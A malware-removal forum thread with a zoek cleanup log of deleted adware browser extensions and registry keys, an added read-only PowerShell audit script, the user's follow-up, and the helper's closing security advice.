SavuEMass - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

Google Voice Search Hotword (Beta) - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn

Last updated at time on date - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb

Lamborghini Sesto Elemento Theme - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\dappigdjllcnkkoacaoolciaolaaiemb

PartyCloud DJ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko

Gmail Offline - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk

Pandora - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl

Free Music Downloads - Mp3 Music - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgbljhhdencbpamajdkebnaaefgllghj

AdBlock - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom

TinEye Reverse Image Search - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl

LastPass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd

SavuEMass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

Webroot Filtering Extension - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd

Until AM Web App - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk

Google Wallet - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Webroot Password Manager - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okfhiodnpcnnnpgbjbhfebjnbagmfhab

Gmail - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

AVG PrivacyFix - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni

App Launcher Customizer for Google™ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponjkmladgjfjgllmhnkhgbgocdigcjm

PorIcEChop - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

 

==== Chrome Fix ======================

 

C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx deleted successfully

C:\ProgramData\WRData\pkg\lpchrome.crx deleted successfully

C:\Users\Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\dappigdjllcnkkoacaoolciaolaaiemb deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgbljhhdencbpamajdkebnaaefgllghj deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okfhiodnpcnnnpgbjbhfebjnbagmfhab deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponjkmladgjfjgllmhnkhgbgocdigcjm deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj deleted successfully

C:\Users\Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-devtools_devtools_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-devtools_devtools_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_banbpclkbhgajgppgifhdeemmielfjke_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_banbpclkbhgajgppgifhdeemmielfjke_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_bepbmhgboaologfdajaanbcjmnhjmhfn_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_bepbmhgboaologfdajaanbcjmnhjmhfn_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_cfhdojbkjhnklbpkdaibdccddilifddb_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_cfhdojbkjhnklbpkdaibdccddilifddb_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_eemcgdkfndhakfknompkggombfjjjeno_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_eemcgdkfndhakfknompkggombfjjjeno_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gakbgbehpeeofmjippjanlhdfemdeppm_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gakbgbehpeeofmjippjanlhdfemdeppm_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pmejhjjecaldkllonlokhkglbdbkdcni_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pmejhjjecaldkllonlokhkglbdbkdcni_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ponjkmladgjfjgllmhnkhgbgocdigcjm_0.localstorage deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ponjkmladgjfjgllmhnkhgbgocdigcjm_0.localstorage-journal deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0 deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_okfhiodnpcnnnpgbjbhfebjnbagmfhab_0 deleted successfully

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh deleted successfully

 

==== Set IE to Default ======================

 

Old Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

 

New Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

 

==== All HKCU SearchScopes ======================

 

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes

{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"

{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-

 

SearchBox&FORM=IE8SRC"

 

==== Deleting CLSID Registry Keys ======================

 

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C55BBCD6-

 

41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C55BBCD6

 

-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{000123B4-

 

9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{000123B4

 

-9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{000123B4-9B42-4900-B3F7-F4B073EFC214} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000123B4-9B42-

 

4900-B3F7-F4B073EFC214} deleted successfully

 

==== Deleting CLSID Registry Values ======================

 

HKEY_USERS\S-1-5-21-610162119-960651099-2309175161-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser

 

\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\{C55BBCD6-41AD-48AD-9953-3609C48EACC7} 

 

deleted successfully

HKEY_LOCAL_MACHINE\software\Wow6432Node\mozilla\Firefox\extensions\fmdownloader@gmail.com deleted successfully

HKEY_LOCAL_MACHINE\software\Wow6432Node\mozilla\Firefox\extensions\ytfmdownloader@gmail.com deleted successfully

 

==== Deleting Registry Keys ======================

 

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\9810b679-6ac3-47d6-b7c4-35b83b0e4a3b 

 

deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\bhicbhhgmeobmgjehpcecbkjpehljipn deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\bpegkgagfojjbcpkihigfmkojdmmimdf deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\ehgldbbpchgpcfagfpfjgoomddhccfgh deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\jbolfgndggfhhpbnkgnpjkfhinclbigj deleted successfully

 

==== Empty IE Cache ======================

 

C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied 

 

successfully

C:\Users\Owner\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\Users\Owner\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully

C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

 

==== Empty FireFox Cache ======================

 

C:\Users\Owner\AppData\Local\Mozilla\Firefox\Profiles\kfjgpmg8.default\Cache emptied successfully

 

==== Empty Chrome Cache ======================

 

C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

 

==== Empty All Flash Cache ======================

 

Flash Cache Emptied Successfully

 

==== Empty All Java Cache ======================

 

Java Cache cleared successfully

 

==== C:\zoek_backup content ======================

 

C:\zoek_backup (files=2472 folders=501 68002642 bytes)

 

==== Empty Temp Folders ======================

 

C:\Users\Default\AppData\Local\Temp emptied successfully

C:\Users\Default User\AppData\Local\Temp emptied successfully

C:\Users\Owner\AppData\Local\Temp will be emptied at reboot

C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully

C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully

C:\WINDOWS\Temp will be emptied at reboot
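The zoek log above shows where this kind of adware had hooked into the browsers: machine-wide Chrome extension keys under HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions, a Browser Helper Object and toolbar CLSID for Internet Explorer, Firefox extensions registered through the registry, a dangling IE DefaultScope pointing at a search scope that did not exist, and per-extension Local Storage in the Chrome profile. Since the original complaint was that the extensions "keep popping up", the practical follow-up is to re-read exactly those locations after the reboot and see whether anything has come back. The script below is an added example written for this thread (it is not part of the original post and is not zoek's own code): it is read-only, deletes nothing, and uses HKCU for the logged-on user where the log shows the user's SID under HKEY_USERS. The list of extension IDs it checks for is copied from the log; the profile path assumes the Default Chrome profile, as in the log.

```powershell
# Added example: read-only re-audit of the browser persistence points the zoek log
# shows being cleaned. Nothing is modified. Assumptions: Default Chrome profile,
# current user == the SID in the log, extension IDs taken from the log.

$report = [ordered]@{}

# 1. IE search scopes: DefaultScope must name a subkey that exists. The log's old
#    value pointed at a scope that was "not found", i.e. a dangling default.
$scopes  = 'HKCU:\Software\Microsoft\Internet Explorer\SearchScopes'
$default = (Get-ItemProperty -Path $scopes -Name DefaultScope -ErrorAction SilentlyContinue).DefaultScope
$report['IE DefaultScope']          = $default
$report['IE DefaultScope resolves'] = [bool]$default -and (Test-Path (Join-Path $scopes $default))
$report['IE scope URLs'] = Get-ChildItem $scopes -ErrorAction SilentlyContinue |
    ForEach-Object { "$($_.PSChildName) -> $((Get-ItemProperty $_.PSPath).URL)" }

# 2. Machine-wide Chrome extension installs (the log deleted four keys here).
#    Anything still present is installed without going through the user's profile.
$chromeExtKeys = 'HKLM:\SOFTWARE\Wow6432Node\Google\Chrome\Extensions',
                 'HKLM:\SOFTWARE\Google\Chrome\Extensions'
$report['Chrome registry extensions'] = foreach ($k in $chromeExtKeys) {
    Get-ChildItem $k -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty $_.PSPath
        "$($_.PSChildName) update_url=$($p.update_url) path=$($p.path)"
    }
}

# 3. IE Browser Helper Objects and toolbar values, each CLSID resolved to the DLL
#    that backs it (HKCR\Wow6432Node\CLSID in the log == HKLM\SOFTWARE\Classes\Wow6432Node\CLSID).
function Resolve-Clsid([string]$clsid) {
    foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID') {
        $srv = Join-Path $root "$clsid\InprocServer32"
        if (Test-Path $srv) { return (Get-ItemProperty $srv).'(default)' }
    }
    return '<no InprocServer32: dangling CLSID>'
}
$bhoKeys = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
$report['IE BHOs'] = foreach ($k in $bhoKeys) {
    Get-ChildItem $k -ErrorAction SilentlyContinue |
        ForEach-Object { "$($_.PSChildName) -> $(Resolve-Clsid $_.PSChildName)" }
}
$toolbarKeys = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar',
               'HKLM:\SOFTWARE\Microsoft\Internet Explorer\Toolbar'
$report['IE toolbars'] = foreach ($k in $toolbarKeys) {
    if (Test-Path $k) {
        (Get-Item $k).GetValueNames() |
            Where-Object { $_ -match '^\{[0-9A-Fa-f-]{36}\}$' } |
            ForEach-Object { "$_ -> $(Resolve-Clsid $_)" }
    }
}

# 4. Firefox extensions registered via the registry (value name = add-on ID, data = path).
$ffKeys = 'HKLM:\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions',
          'HKLM:\SOFTWARE\Mozilla\Firefox\Extensions',
          'HKCU:\SOFTWARE\Mozilla\Firefox\Extensions'
$report['Firefox registry extensions'] = foreach ($k in $ffKeys) {
    if (Test-Path $k) {
        $item = Get-Item $k
        foreach ($n in $item.GetValueNames()) { "$n -> $($item.GetValue($n))" }
    }
}

# 5. Extensions unpacked in the Chrome profile, with the name from each manifest.json
#    (names of the form __MSG_xxx__ are localized placeholders; look in _locales for the text).
$extDir = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Extensions'
$report['Chrome profile extensions'] = Get-ChildItem $extDir -Directory -ErrorAction SilentlyContinue |
    ForEach-Object {
        $manifest = Get-ChildItem $_.FullName -Recurse -Filter manifest.json -ErrorAction SilentlyContinue |
                    Select-Object -First 1
        $name = if ($manifest) { (Get-Content $manifest.FullName -Raw | ConvertFrom-Json).name } else { '?' }
        "$($_.Name) ($name)"
    }

# 6. The extension IDs the log shows being removed; flag any that are back in the profile.
$removedIds = 'bhicbhhgmeobmgjehpcecbkjpehljipn', 'bpegkgagfojjbcpkihigfmkojdmmimdf',
              'ehgldbbpchgpcfagfpfjgoomddhccfgh', 'jbolfgndggfhhpbnkgnpjkfhinclbigj',
              'pafkbggdmjlpgkdkcbjmhmfcdpncadgh'
$report['Removed IDs present again'] = @($removedIds | Where-Object { Test-Path (Join-Path $extDir $_) })

$report.GetEnumerator() | ForEach-Object { "== $($_.Key) =="; $_.Value; '' }
```

Run it from a normal PowerShell prompt after the reboot; reading HKLM does not need elevation. Two results matter most: "IE DefaultScope resolves" should be True, and "Removed IDs present again" should be empty. Any BHO or toolbar CLSID that resolves to a DLL outside Program Files or the Windows directory, or any Chrome registry extension whose update_url is not a Google domain, is worth reporting back in the thread rather than deleting by hand, since the helper asked that no tools be run unsupervised.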

[Screenshot: ZoekexeQuarantineFileScreenshot_10729201]

 

 

The problem occurred when I got ahead of the instructions and ran the zoek.exe file without disabling Webroot first, I apologize for my mistake.  However, despite my mistake, I am concerned that Webroot flagged Zoek.exe as a Trojan virus.  Because I believe that you are a trusted advisor and never had problems before on Malwarebytes.org, I went ahead and ran the Zoek.exe file anyway.  So far I have not done anything with the Quarantine items in Webroot.

 

I did notice that every single add-on extension for Chrome was wiped out and replaced with a "puzzle piece picture" even though they are "Enabled" (they do not work).  I know not to install stuff during this process; however, my LastPass extension I depend on because I cannot remember 31-character string passwords with symbols etc.  So out of necessity, to be able to log into the Malwarebytes.org forums, I did delete and reinstall the LastPass add-on extension from the Chrome Store into Chrome.

 

Within Chrome I noticed the following:

 

[Image: ChromeApps_zps1986cb8e.jpg]

 

All of my Chrome apps are replaced with that different picture.  I have tested a couple of them and the apps that I tested worked.  They do not have the specific app picture as I had before.

 

With all that in mind I did notice that the PorIcEChop & SavuEMass browser virus is gone in Chrome, Firefox and Internet Explorer for now.

 

What is the next step?

 

Thanks.  And by the way, I like your Avatar picture...lol. Cool!

 

- fryer


Also, please forgive me for not paying closer attention to the instructions.  In the past I have always been asked to post the logs within the reply, and that is what I "thought" I saw in your instructions.  However, I was wrong in my assumption.

 

In the future I will attach my logs as an attachment for you.

 

-fryer


Then we're done here ;)

Below you will find my thoughts about securing your machine. Go through it; you will benefit from some useful advice about safe computing.

Recommended reading:

• MUST READ - general maintenance: What to do if your Computer is running slowly?

Recommended additional software:

• TFC - to clean unneeded temporary files.
• Malwarebytes' Anti-Malware - to scan your system from time to time in search of malware.
• Malwarebytes' Anti-Exploit - to block exploitation of many commonly exploited vulnerabilities.
• McShield - to prevent infections spread by removable media.
• CryptoPrevent - to protect yourself from the very severe CryptoLocker infection.
• Unchecky - to prevent the installation of additional foistware bundled with legitimate installers.

The following will implement some post-cleanup procedures:

=> Please download DelFix by Xplode to your Desktop.

Run the tool and check the following boxes:
[x] Remove disinfection tools
[x] Create registry backup
[x] Purge System Restore
Click the Run button and wait a few seconds for the programme to complete its work.
At this point all the tools we used here should be gone. The tool will create a report for you (C:\DelFix.txt).

The tool will also record the healthy state of the registry and make a backup using the ERUNT program in %windir%\ERUNT\DelFix.
The tool deletes old system restore points and creates a fresh system restore point after cleaning.

My help is free for everybody.

If you're happy with the help provided and/or wish to buy me a beer for the assistance you received, then you can consider a donation.
Thank you!

Stay safe,
TwinHeadedEagle :)

  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!


This topic is now closed to further replies.